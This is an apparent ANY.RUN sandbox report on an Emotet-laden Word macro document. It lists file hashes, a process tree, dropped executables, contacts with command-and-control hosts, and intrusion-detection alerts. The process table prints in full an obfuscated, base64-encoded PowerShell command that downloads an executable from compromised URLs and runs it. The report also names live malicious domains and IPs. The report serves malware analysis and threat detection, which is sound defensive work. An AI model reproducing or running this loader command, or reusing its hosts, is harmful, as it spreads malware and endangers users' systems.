analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

FILE07154.doc

Full analysis: https://app.any.run/tasks/21edb665-c52a-4423-b913-1dbb2520b049
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: March 21, 2019, 17:40:34
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
trojan
feodo
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Mar 21 15:07:00 2019, Last Saved Time/Date: Thu Mar 21 15:07:00 2019, Number of Pages: 1, Number of Words: 2, Number of Characters: 12, Security: 0
MD5:

D4DC2EA26D6DB2495D1D6F59A998AA1B

SHA1:

DD434B109406B6577E144F7F0D53E1BCAC5C1FAB

SHA256:

620F8B004D9025D11466AC548F07D0826EA4AA7EA78109D5DC91FB403A64AF02

SSDEEP:

3072:+977HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qfKbms7Ow9DXFMpzAK:c77HUUUUUUUUUUUUUUUUUUUT52VGemjl

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 966.exe (PID: 2788)
      • 966.exe (PID: 604)
      • wabmetagen.exe (PID: 1012)
      • wabmetagen.exe (PID: 3600)
    • Emotet process was detected

      • wabmetagen.exe (PID: 1012)
    • Connects to CnC server

      • wabmetagen.exe (PID: 3600)
    • EMOTET was detected

      • wabmetagen.exe (PID: 3600)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2608)
    • Changes the autorun value in the registry

      • wabmetagen.exe (PID: 3600)
  • SUSPICIOUS

    • Application launched itself

      • wabmetagen.exe (PID: 1012)
      • 966.exe (PID: 604)
    • Starts itself from another location

      • 966.exe (PID: 2788)
    • Executable content was dropped or overwritten

      • 966.exe (PID: 2788)
      • powershell.exe (PID: 2608)
    • Creates files in the user directory

      • powershell.exe (PID: 2608)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1920)
    • Reads settings of System Certificates

      • WINWORD.EXE (PID: 1920)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1920)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 13
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 12
Words: 2
Pages: 1
ModifyDate: 2019:03:21 15:07:00
CreateDate: 2019:03:21 15:07:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe powershell.exe 966.exe no specs 966.exe #EMOTET wabmetagen.exe no specs #EMOTET wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
1920"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FILE07154.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2608powershell -e JABKAFUAQQBCAEEAWABrAFEAPQAoACcASwAnACsAJwBCAHgARABBAEEAJwApADsAJABmAEcARABBAEEAWgB4AD0ALgAoACcAbgBlAHcAJwArACcALQAnACsAJwBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABWAFEAQQBfADQAVQA9ACgAJwBoAHQAdABwADoALwAvAHMAaQBhAG0AbgBhACcAKwAnAHQAdQAnACsAJwByACcAKwAnAGEAbAAuAGMAbwAnACsAJwBtAC8AdABtACcAKwAnAHAALwBFAG0AQwAnACsAJwAvAEAAaAB0AHQAJwArACcAcAA6ACcAKwAnAC8AJwArACcALwBjAGgAZQBmAG0AbwAnACsAJwBuACcAKwAnAGcAJwArACcAaQBvAHYAJwArACcAaQAuAGMAbwBtACcAKwAnAC8AJwArACcAdwAnACsAJwBwACcAKwAnAC8AJwArACcAeQBpAGcAQQAvACcAKwAnAEAAaAB0AHQAJwArACcAcAA6ACcAKwAnAC8ALwBzAGkAbQBwAGwAeQAnACsAJwByAGUAcwAnACsAJwBwAG8AJwArACcAbgBzACcAKwAnAGkAdgAnACsAJwBlAC4AYwBvACcAKwAnAG0ALwBzACcAKwAnAGEAbQBwACcAKwAnAGwAJwArACcAZQBzAC8AMwBJACcAKwAnAC8AQABoAHQAdABwAHMAOgAvACcAKwAnAC8AaABlACcAKwAnAGMAaABpACcAKwAnAHoAbwAnACsAJwBzAHkAYwAnACsAJwBvAG4AagB1AHIAbwAnACsAJwBkAGUAYQBtAG8AcgAuACcAKwAnAGkAbgBmAG8ALwAnACsAJwB3AHAALQBpAG4AYwBsAHUAZABlACcAKwAnAHMALwBGAEcAJwArACcARgAvAEAAJwArACcAaAB0AHQAcAA6AC8ALwB2AGkAJwArACcAcwBhAC4AbwByAGcALgB1AGEALwB3AHAALQBjAG8AbgB0AGUAJwArACcAbgB0ACcAKwAnAC8AbgAnACsAJwBuAFMAWgAvACcAKQAuACgAJwBTAHAAbAAnACsAJwBpAHQAJwApAC4ASQBuAHYAbwBrAGUAKAAnAEAAJwApADsAJABKAEQAWABCAEMAQwBCAF8APQAoACcAWgBBAFgAYwBBAEEAJwArACcAQgAnACkAOwAkAG8AawBfAFUAMQA0AFUAWgAgAD0AIAAoACcAOQAnACsAJwA2ADYAJwApADsAJABuAEEAQQBDAEEANABCAD0AKAAnAEUAJwArACcAQgB3AFoAXwAxACcAKQA7ACQAVABDAHcAWAB3AEEAVQBvAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABvAGsAXwBVADEANABVAFoAKwAoACcALgAnACsAJwBlAHgAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABTAEEAUQB3AEIAXwBRACAAaQBuACAAJABWAFEAQQBfADQAVQApAHsAdAByAHkAewAkAGYARwBEAEEAQQBaAHgALgAoACcARAAnACsAJwBvAHcAbgBsAG8AYQBkACcAKwAnAEYAJwArACcAaQBsAGUAJwApAC4ASQBuAHYAbwBrAGUAKAAkAFMAQQBRAHcAQgBfAFEALAAgACQAVABDAHcAWAB3AEEAVQBvACkAOwAkAGYAXwBBAGMAQwAxAEcAPQAoACcAdAAnACsAJwB3AFUAVQBRAFgARAAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAJwArACcAZQBtACcAKQAgACQAVABDAHcAWAB3AEEAVQBvACkALgAiAEwARQBOAGcAYABUAGgAIgAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AC4AKAAnAEkAJwArACcAbgB2AG8AawBlAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAFQAQwB3AFgAdwBBAFUAbwA7ACQASABRAEEAQgBBAEQAPQAoACcAcQBvADEAJwArACcAQQBVAEcAQgAnACkAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgBVAEcAUQBBAEEARwB3AD0AKAAnAEsAJwArACcAVQAxAFUAQgBBADEAJwApADsAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
604"C:\Users\admin\966.exe" C:\Users\admin\966.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Dism Image Servicing Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2788--4d80d3b7C:\Users\admin\966.exe
966.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Dism Image Servicing Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1012"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
966.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Dism Image Servicing Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3600--9bc43e78C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Dism Image Servicing Utility
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
17 297
Read events
7 984
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
3
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
1920WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8B01.tmp.cvr
MD5:
SHA256:
2608powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XSL0PQW6XUE6Z63KNY78.temp
MD5:
SHA256:
1920WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\query[1].asmx
MD5:
SHA256:
1920WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:91839BC6B46AD4972AF08C7987A6ECD8
SHA256:6283EE8725C9B3C2C881DA2BB7D01DD60E08B9779593EE793B14C3C44ADFDFF6
1920WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\ONetConfig\b6419f5bc3093b5f22142ce454e02407.xmlxml
MD5:8A6667ECB6421BD5F89720A2F81A0E3E
SHA256:104D5C1B6203EF4F056EEE7CF36F462C5A7130AD41E42356D2E142108C2457B3
1920WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:A3D37A96BE99E1B37F142EAB31105E77
SHA256:10776DED098C89C43628A733533878C3854AA3666210F1501E5D0D74311EF8F0
2608powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
2608powershell.exeC:\Users\admin\966.exeexecutable
MD5:AB7652C46251DABD0B6260062F9DC723
SHA256:1E2176C1E391C77B5682567D4C7C58C6A1AE22668BE6670169C1C048C593BFC4
2608powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf985e.TMPbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
2788966.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:AB7652C46251DABD0B6260062F9DC723
SHA256:1E2176C1E391C77B5682567D4C7C58C6A1AE22668BE6670169C1C048C593BFC4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
4
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2608
powershell.exe
GET
200
216.22.21.82:80
http://siamnatural.com/tmp/EmC/
US
executable
187 Kb
malicious
3600
wabmetagen.exe
POST
200
185.94.252.3:443
http://185.94.252.3:443/between/guids/ringin/
DE
binary
132 b
malicious
1920
WINWORD.EXE
GET
200
52.109.88.8:80
http://office14client.microsoft.com/config14?UILCID=1033&CLCID=1033&ILCID=1033&HelpLCID=1033&App={019C826E-445A-4649-A5B0-0BF08FCC4EEE}&build=14.0.6023
NL
xml
1.99 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1920
WINWORD.EXE
52.109.120.29:443
rr.office.microsoft.com
Microsoft Corporation
HK
whitelisted
2608
powershell.exe
216.22.21.82:80
siamnatural.com
ServInt
US
malicious
3600
wabmetagen.exe
185.94.252.3:443
Andreas Fahl trading as Megaservers.de
DE
malicious
1920
WINWORD.EXE
52.109.88.8:80
office14client.microsoft.com
Microsoft Corporation
NL
whitelisted

DNS requests

Domain
IP
Reputation
siamnatural.com
  • 216.22.21.82
malicious
office14client.microsoft.com
  • 52.109.88.8
whitelisted
rr.office.microsoft.com
  • 52.109.120.29
whitelisted

Threats

PID
Process
Class
Message
2608
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2608
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2608
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3600
wabmetagen.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 6
3600
wabmetagen.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
1 ETPRO signatures available at the full report
No debug info